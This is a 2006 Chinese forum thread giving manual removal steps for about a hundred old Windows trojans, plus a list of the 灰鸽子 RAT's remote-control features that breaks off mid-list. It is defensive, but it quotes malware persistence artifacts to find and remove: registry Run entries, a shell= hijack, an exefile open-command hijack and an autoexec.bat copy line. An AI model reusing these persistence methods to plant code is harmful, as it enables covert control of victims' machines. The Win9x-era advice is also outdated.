开封论坛汴梁★兴趣电脑网络 → [分享]常见病毒/木马清除方法


  共有6175人关注过本帖树形打印复制链接

主题:[分享]常见病毒/木马清除方法

帅哥哟,离线,有人找我吗?
追梦无极限
  1楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
[分享]常见病毒/木马清除方法  发帖心情 Post By:2006-08-13 21:31:53 [显示全部帖子]

100种木马的手工清除方法

1. 冰河v1.1 v2.2
这是国产最好的木马 作者:黄鑫

清除木马v1.1
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
查找以下的两个路径,并删除
" C:\windows\system\ kernel32.exe"
" C:\windows\system\ sy***plr.exe"
关闭Regedit
重新启动到MSDOS方式
删除C:\windows\system\ kernel32.exe和C:\windows\system\ sy***plr.exe木马程序
重新启动。OK

清除木马v2.2
服务器程序、路径用户是可以随意定义,写入注册表的键名也可以自己定义。
因此,不能明确说明。
你可以察看注册表,把可疑的文件路径删除。
重新启动到MSDOS方式
删除于注册表相对应的木马程序
重新启动Windows。OK

2. Acid Battery v1.0
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Explorer ="C:\WINDOWS\expiorer.exe"
关闭Regedit
重新启动到MSDOS方式
删除c:\windows\expiorer.exe木马程序
注意:不要删除正确的ExpLorer.exe程序,它们之间只有i与L的差别。
重新启动。OK

3. Acid Shiver v1.0 + 1.0Mod + lmacid
清除木马的步骤:
重新启动到MSDOS方式
删除C:\windows\MSGSVR16.EXE
然后回到Windows系统
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Explorer = "C:\WINDOWS\MSGSVR16.EXE"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
删除右边的Explorer = "C:\WINDOWS\MSGSVR16.EXE"
关闭Regedit
重新启动。OK
重新启动到MSDOS方式
删除C:\windows\wintour.exe然后回到Windows系统
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Wintour = "C:\WINDOWS\WINTOUR.EXE"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
删除右边的Wintour = "C:\WINDOWS\WINTOUR.EXE"
关闭Regedit
重新启动。OK

4. Ambush
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的zka = "zcn32.exe"
关闭Regedit
重新启动到MSDOS方式
删除C:\Windows\ zcn32.exe
重新启动。OK

5. AOL Trojan
清除木马的步骤:
启动到MSDOS方式
删除C:\ command.exe(删除前取消文件的隐含属性)
注意:不要删除真的command.com文件。
删除C:\ americ~1.0\buddyl~1.exe(删除前取消文件的隐含属性)
删除C:\ windows\system\norton~1\regist~1.exe(删除前取消文件的隐含属性)
打开WIN.INI文件
在[WINDOWS]下面"run="和"load="都加载者特洛伊木马程序的路径,必须清除它们:
run=
load=
保存WIN.INI
还要改正注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的WinProfile = c:\command.exe
关闭Regedit,重新启动Windows。OK

6. Asylum v0.1, 0.1.1, 0.1.2, 0.1.3 + Mini 1.0, 1.1
清除木马的步骤:
注意:木马程序默认文件名是wincmp32.exe,然而程序可以随意改变文件名。
我们可以根据木马修改的system.ini和win.ini两个文件来清除木马。
打开system.ini文件
在[BOOT]下面有个"shell=文件名"。正确的文件名是explorer.exe
如果不是"explorer.exe",那么那个文件就是木马程序,把它查找出来,删除。
保存退出system.ini
打开win.ini文件
在[WINDOWS]下面有个run=
如果你看到=后面有路径文件名,必须把它删除。
正确的应该是run=后面什么也没有。
=后面的路径文件名就是木马,把它查找出来,删除。
保存退出win.ini。
OK

7. AttackFTP
清除木马的步骤:
打开win.ini文件
在[WINDOWS]下面有load=wscan.exe
删除wscan.exe ,正确是load=
保存退出win.ini。
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Reminder="wscan.exe /s"
关闭Regedit,重新启动到MSDOS系统中
删除C:\windows\system\ wscan.exe
OK

8. Back Construction 1.0 - 2.5
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的"C:\WINDOWS\Cmctl32.exe"
关闭Regedit,重新启动到MSDOS系统中
删除C:\WINDOWS\Cmctl32.exe
OK

9. BackDoor v2.00 - v2.03
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的"c:\windows\notpa.exe /o=yes"
关闭Regedit,重新启动到MSDOS系统中
删除c:\windows\notpa.exe
注意:不要删除真正的notepad.exe笔记本程序
OK

10. BF Evolution v5.3.12
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的(Default)=" "
关闭Regedit,再次重新启动计算机。
将C:\windows\system\ .exe(空格exe文件)
OK

11. BioNet v0.84 - 0.92 + 2.21
0.8X版本是运行在Win95/98
0.9X以上版本有运行在Win95/98 和WinNT上两个软件
客户-服务器协议是一样的,因而NT客户能黑95/98被感染的机器,和Win95/98客户能黑
NT被感染的系统完全一样。
清除木马的步骤:
首先准备一张98的启动盘,用它启动后,进入c:\windows目录下,用attrib libupd~1.
exe -h
命令让木马程序可见,然后删除它。
抽出软盘后重新启动,进入98下,在注册表里找到:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
的子键WinLibUpdate = "c:\windows\libupdate.exe -hide"
将此子键删除。

12. Bla v1.0 - 5.03
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Systemdoor = "C:\WINDOWS\System\mprdll.exe"
关闭Regedit,重新启动计算机。
查找到C:\WINDOWS\System\mprdll.exe和
C:\WINDOWS\system\rundll.exe
注意:不要删除C:\WINDOWS\RUNDLL.EXE正确文件。
并删除两个文件。
OK

13. BladeRunner
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
可以找到System-Tray = "c:\something\something.exe"
右边的路径可能是任何东西,这时你不需要删除它,因为木马会立即自动加上,你需要
的是记下木马的名字与目录,然后退回到MS-DOS下,找到此木马文件并删除掉。
重新启动计算机,然后重复第一步,在注册表中找到木马文件并删除此键。

14. Bobo v1.0 - 2.0
清除木马v1.0
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的DirrectLibrarySupport ="C:\WINDOWS\SYSTEM\Dllclient.exe"
关闭Regedit,重新启动计算机。
DEL C:\Windows\System\Dllclient.exe
OK
清除木马v2.0
打开注册表Regedit
点击目录至:
HKEY_USER/.Default/Software/Mirabilis/ICQ/Agent/Apps/ICQ Accel/
ICQ Accel是一个“假象“的主键,选中ICQ Accel主键并把它删除。
重新启动计算机。OK

15. BrainSpy vBeta
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
右边有 ??? = "C:\WINDOWS\system\BRAINSPY .exe"
???标签选是随意改变的。
关闭Regedit,重新启动计算机
查找删除C:\WINDOWS\system\BRAINSPY .exe
OK

16. Cain and Abel v1.50 - 1.51
这是一个口令木马
进入MS-DOS方式
查找到C:\windows\msabel32.exe
并删除它。OK

17. Canasson
清除木马的步骤:
打开WIN.INI文件
查找c:\msie5.exe,删除全部主键
保存win.ini
重新启动计算机
删除c:\msie5.exe木马文件
OK

18. Chupachbra
清除木马的步骤:
打开WIN.INI文件
[Windows]的下面有两个行
run=winprot.exe
load=winprot.exe
删除winprot.exe
run=
load=
保存Win.ini,再打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的"System Protect" = winprot.exe
重新启动Windows
查找到C:\windows\system\ winprot.exe,并删除。
OK

19. Coma v1.09
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的"RunTime" = C:\windows\msgsrv36.exe
重新启动Windows
查找到C:\windows\ msgsrv36.exe,并删除。
OK

20. Control
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的Load MSchv Drv = C:\windows\system\MSchv.exe
保存Regedit,重新启动Windows
查找到C:\windows\system\MSchv.exe,并删除。
OK

21. Dark Shadow
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\RunServices
删除右边的winfunctions="winfunctions.exe"
保存Regedit,重新启动Windows
查找到C:\windows\system\ winfunctions.exe,并删除。
OK

22. DeepThroat v1.0 - 3.1 + Mod (Foreplay)
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
版本1.0
删除右边的项目"System32"=c:\windows\system32.exe
版本2.0-3.1
删除右边的项目"SystemTray" = "Systray.exe"
保存Regedit,重新启动Windows
版本1.0删除c:\windows\system32.exe
版本2.0-3.1
删除c:\windows\system\systray.exe
OK

23. Delta Source v0.5 - 0.7
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的项目:DS admin tool = C:\TEMPSERVER.exe
保存Regedit,重新启动Windows
查找到C:\TEMPSERVER.exe,并删除它。
OK

24. Der Spaeher v3
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的项目:explore = "c:\windows\system\dkbdll.exe "
保存Regedit,重新启动Windows
删除c:\windows\system\dkbdll.exe木马文件。
OK

--

25. Doly v1.1 - v1.7 (SE)
清除木马V1.1-V1.5版本:
这几个木马版本的木马程序放在三处,增加二个注册项目,还增加到Win.ini项目。
首先,进入MS-DOS方式,删除三个木马程序,但V1.35版本多一个木马文件mdm.exe。
把下列各项全部删除:
C:\WINDOWS\SYSTEM\tesk.sys
C:\WINDOWS\Start Menu\Programs\Startup\mstesk.exe
c:\Program Files\MStesk.exe
c:\Program Files\Mdm.exe
重新启动Windows。
接着,打开win.ini文件
找到[WINDOWS]下面load=c:\windows\system\tesk.exe项目,删除路径,改变为load=
保存win.ini文件。
最后,修改注册表Regedit
找到以下两个项目并删除它们
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Ms tesk = "C:\Program Files\MStesk.exe"

HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
Ms tesk = "C:\Program Files\MStesk.exe"
再寻找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ss
这个组是木马的全部参数选择和设置的服务器,删除这个ss组的全部项目。
关闭保存Regedit。
还有打开C:\AUTOEXEC.BAT文件,删除
@echo off copy c:\sys.lon c:\windows\StartMenu\Startup Items\
del c:\win.reg
关闭保存autoexec.bat。
OK
清除木马V1.6版本:
该木马运行时,将不能通过98的正常操作关闭,只能RESET键。彻底清除步骤如下:
1.打开控制面板——添加删除程序——删除memory manager 3.0,这就是木马程序,但
是它并不会把木马的EXE文件删除掉。
2.用98或DOS启动盘启动(用RESET键)后,转入C:\,编辑AUTOEXEC。BAT,把如下内容
删除:
@echo off copy c:\sys.lon c:\windows\startm~1\programs\startup\mdm.exe
del c:\win.reg
保存AUTOEXEC。BAT文件并返回DOS后,在C:\根目录下删除木马文件:
del sys.lon
del windows\startm~1\programs\startup\mdm.exe
del progra~1\mdm.exe
3.抽出软盘重新启动,进入98后,把c:\program files\目录下的memory manager 目录
删除。
清除木马V1.7版本:
首先,打开C:\AUTOEXEC.BAT文件,删除
@echo off copy c:\sys.lon c:\windows\startm~1\programs\startup\mdm.exe
del c:\win.reg
关闭保存autoexec.bat
然后打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
找到c:\windows\system\mdm.exe路径并删除这个项目
点击目录至:
HKEY_USER/.Default/Software/Marabilis/ICQ/Agent/Apps/
找到"C:\windows\system\kernal32.exe"路径并删除这个项目
关闭保存Regedit。重新启动Windows。
最后,删除以下木马程序:
c:\sys.lon
c:\iecookie.exe
c:\windows\start menu\programs\startup\mdm.exe
c:\program files\mdm.exe
c:\windows\system\mdm.exe
c:\windows\system\kernal32.exe
注意:kernal32是A
OK

75. Revenger v1.0 - 1.5
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:AppName ="C:\...\server.exe"
关闭保存Regedit,重新启动Windows
在c:\windows查找相应的木马程序server.exe,并删除
OK

76. Ripper
清除木马的步骤:
打开system.ini文件
将shell=explorer.exe sysrunt.exe
改为shell= explorer.exe
关闭保存system.ini,重新启动Windows
在c:\windows查找相应的木马程序sysrunt.exe,并删除
OK

77. Satans Back Door v1.0
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
删除右边的项目:sysprot protection ="C:\windows\sysprot.exe"
关闭保存Regedit,重新启动Windows
删除C:\windows\sysprot.exe
OK

78. Schwindler v1.82
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:User.exe = "C:\WINDOWS\User.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\User.exe
OK

79. Setup Trojan (Sshare) +Mod Small Share
这个共享隐藏C盘的木马
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\

选择右边有"C$"的项目,并全部删除
关闭保存Regedit,重新启动Windows
OK

80. ShadowPhyre v2.12.38 - 2.X
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:WinZipp = "C:\WINDOWS\SYSTEM\WinZipp.exe /nomsg"
或者WinZip = "C:\WINDOWS\SYSTEM\WinZip.exe /nomsg"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\ WinZipp.exe或者C:\WINDOWS\ WinZip.exe
OK




如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

论坛上回帖的意义和技巧(严重潜水者坚决清除)  回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  2楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-13 21:33:03 [显示全部帖子]

81. Share All
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\

这里你将看到所有被木马共享出来的你的硬盘符号,把它们一个个删除掉。

82. ShitHeap
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
删除右边的项目:recycle-bin = "c:\windows\system\recycle-bin.exe"
或者recycle-bin = "c:\windows\system.exe"
关闭保存Regedit,重新启动Windows
删除c:\windows\system\recycle-bin.exe或者c:\windows\system.exe
OK

83. Snid v1 - 2
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:System-tray = "c:\windows\temp$01.exe"
关闭保存Regedit,重新启动Windows
删除c:\windows\temp$01.exe
OK

84. Softwarst
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:NetApp = C:\windows\system\winserv.exe
关闭保存Regedit,重新启动Windows
删除C:\windows\system\winserv.exe
OK

85. Spirit 2000 Beta - v1.2 (fixed)
清除木马v Beta版本:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:internet = "c:\windows\netip.exe "
关闭保存Regedit
打开win.ini文件
查找到run=c:\windows\netip.exe
更改为:run=
关闭保存win.ini,重新启动Windows
删除c:\windows\netip.exe和c:\windows\netip.exe
OK
清除木马v 1.2版本:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SystemTray = "c:\windows\windown.exe "
关闭保存Regedit,重新启动Windows
删除c:\windows\windown.exe
OK
清除木马v 1.2(fixed)版本:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Server 1.2.exe = "c:\windows\server 1.2.exe"
关闭保存Regedit,重新启动Windows
删除c:\windows\server 1.2.exe
OK

86. Stealth v2.0 - 2.16
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Winprotect System = "C:\WINDOWS\winprotecte.exe
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\winprotecte.exe
OK

87. SubSeven - Introduction
清除木马v1.0 - 1.1:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SystemTrayIcon = "C:\WINDOWS\SysTrayIcon.Exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\SysTrayIcon.Exe
OK
清除木马v1.3 - 1.4 - 1.5:
打开win.ini文件
查找到run=nodll
更改为run=
关闭保存win.ini,重新启动Windows
删除c:\windows\nodll.exe
OK
清除木马v1.6:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SystemTray = "SysTray.Exe"
关闭保存Regedit,重新启动Windows
删除C:\windows\systray.exe
OK
清除木马v1.7:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
\
查找到右边的项目:C:\windows\kernel16.dl,并删除
关闭保存Regedit,重新启动Windows
删除C:\windows\kernel16.dl
OK
清除木马v1.8:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run和
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
\
查找到右边的项目:c:\windows\system.ini.,并删除
关闭保存Regedit。
打开win.ini文件
查找到run= kernel16.dl
更改为run=
关闭保存win.ini。
打开system.ini文件
查找到shell=explorer.exe kernel32.dl
更改为shell=explorer.exe
关闭保存system.ini,重新启动Windows
删除C:\windows\kernel16.dl
OK
清除木马v1.9 - 1.9b:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run和
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
\
删除右边的项目:RegistryScan = "rundll16.exe"
关闭保存Regedit,重新启动Windows
删除C:\windows\rundll16.exe
OK
清除木马v2.0:
打开system.ini文件
查找到shell=explorer.exe trojanname.exe
更改为shell=explorer.exe
关闭保存system.ini,重新启动Windows
删除c:\windows\rundll16.exe
OK
清除木马v2.1 - 2.1 Gold + SubStealth- 2.1.3 Mod + 2.1.3 MUIE + 2.1 Bonus:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run和
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
\
删除右边的项目:WinLoader = MSREXE.EXE
hkey_classes_root\exefile\shell\open\command
将右边的项目更改为:@="\"%1\" %*"
关闭保存Regedit。
打开win.ini文件
查找到run=msrexe.exe和
load=msrexe.exe
更改为run=
load=
关闭保存win.ini。
打开system.ini文件
查找到shell=explore.exe msrexe.exe
更改为shell=explorer.exe
关闭保存system.ini,重新启动Windows
删除C:\windows\ msrexe.exe
C:\windows\system\systray.dll
OK
清除木马v2.2b1:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run和
删除右边的项目:加载器 = "c:\windows\system\***"
注:加载器和文件名是随意改变的
关闭保存Regedit。
打开win.ini文件
更改为run=
关闭保存win.ini。
打开system.ini文件
更改为shell=explorer.exe
关闭保存system.ini,重新启动Windows
删除相对应的木马程序
OK

88. Telecommando 1.54
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SystemApp="ODBC.EXE"
关闭保存Regedit,重新启动Windows
删除C:\windows\system\ ODBC.EXE
OK
--





89. The Unexplained
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:InetB00st = "C:\WINDOWS\TEMPINETB00ST.EXE"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\TEMPINETB00ST.EXE
OK

90. Thing v1.00 - 1.60
清除木马v1.00-1.12:
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:(Default) = "C:\some\path\here\thing.exe"
也有一些是在:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\SessionManager\Known16DL
Ls\
删除右边的项目:wsasrv.exe = "wsasrv.exe"
关闭保存Regedit,重新启动Windows
删除C:\some\path\here\thing.exe
OK
清除木马v 1.20版本:
进入MS_DOS方式:
del winspc13.exe
del ms097.exe
打开system.ini文件
查找到shell=explorer.exe ms097.exe
更改为:shell=explorer.exe
关闭保存system.ini,重新启动Windows
OK
清除木马v1.50版本:
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
这个项目的路径和文件名是随机改变的,察看有可疑的文件路径,将它删除。
关闭保存Regedit。
打开system.ini文件
查找到shell=explorer.exe后面是木马文件
更改为:shell=explorer.exe
关闭保存system.ini,重新启动Windows
删除相应的木马文件
OK
清除木马v1.50版本:
进入MS_DOS方式:
del winspc13.exe
del ms097.exe
打开system.ini文件
查找到shell=explorer.exe后面是木马文件
更改为:shell=explorer.exe
关闭保存system.ini,重新启动Windows
删除相应的木马文件
OK

91. Transmission Scount v1.1 - 1.2
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Kernel16" = C:\WINDOWS\Kernel16.exe
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\Kernel16.exe
OK

92. Trinoo
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目: System Services = service.exe
关闭保存Regedit,重新启动Windows
删除C:\windows\system\service.exe
OK

93. Trojan Cow v1.0
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SysWindow = "C:\WINDOWS\Syswindow.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\Syswindow.exe
OK

94. TryIt
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Rc5Dec = C:\Program Files\Internet Explorer\_.exe -guistart
关闭保存Regedit,重新启动Windows
删除C:\Program Files\Internet Explorer\_.exe
OK

95. Vampire v1.0 - 1.2
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Sockets ="c:\windows\system\Sockets.exe"
关闭保存Regedit,重新启动Windows
删除c:\windows\system\Sockets.exe
OK

96. WarTrojan v1.0 - 2.0
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Kernel32 = "C:\somepath\server.exe"
关闭保存Regedit,重新启动Windows
删除C:\somepath\server.exe
OK


97. wCrat v1.2b
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:MS Windows System Explorer ="C:\WINDOWS\sy***plor.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\sy***plor.exe
OK

98. WebEx (v1.2, 1.3, and 1.4)
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:RunDl32 = "C:\windows\system\task_bar"
关闭保存Regedit,重新启动Windows
删除C:\windows\system\task_bar.exe和c:\windows\system\msinet.ocx
OK

99. WinCrash v2
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:WinManager = "c:\windows\server.exe"
关闭保存Regedit
打开win.ini文件
查找到run=c:\windows\server.exe
更改为:run=
保存关闭win.ini,重新启动Windows
删除c:\windows\server.exe
OK

100. WinCrash
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:MsManager ="SERVER.EXE"
关闭保存Regedit,重新启动Windows
删除C:\windows\system\ SERVER.EXE
OK

101. Xanadu v1.1
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SETUP = "c:\somepath\setup.exe"
关闭保存Regedit,重新启动Windows
删除c:\somepath\setup.exe
OK

102. Xplorer v1.20
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:PCX = "C:\WINDOWS\system\PCX.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\system\PCX.exe
OK

103. Xtcp v2.0 - 2.1
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:msgsv32 = "C:\WINDOWS\system\winmsg32.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\system\winmsg32.exe
OK

104. YAT
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
删除右边的项目:Batterieanzeige = "c:\pathnamehere\server.exe /nomsg"
关闭保存Regedit,重新启动Windows
删除c:\pathnamehere\server.exe
OK





如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

 回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  3楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-13 21:34:28 [显示全部帖子]

关于“灰鸽子”

鉴于不少朋友反应对灰鸽子束手无策,想了想,还是写点自己在查杀灰鸽子方法的小小经验吧

这个木马中了之后,别的可以对你的电脑进行如下操作:
【1】对远程计算机文件管理:模枋 Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。
【2】远程控制命令:查看远程系统信息、剪切板查看、进程管理、窗口管理、插件功能、服务管理、共享管理、代理服务、MS-Dos模拟!
【3】捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作送到远程实现实时控制功能!
【4】视频监控,可以监控远程控制头!,还有语音监听和发送功能!
【5】telnet(超级终端).
【6】语音监听和发送!可以和远程主机进程语音对话~~
【7】插件功能:用户可以按自己的需要添加和使用插件(如服务端隐身插件,使用服务端隐藏进程、服务、文件等。)
【8】注册表模拟器:远程注册表操作就像操作本地注册表一样方便~~
【9】命令广播:可以对自动上线主机进行命令播,如关机、重启、打开网页,筛选符合条件的机等,点一个按钮就可以让N台机器同时关机或其它操作!
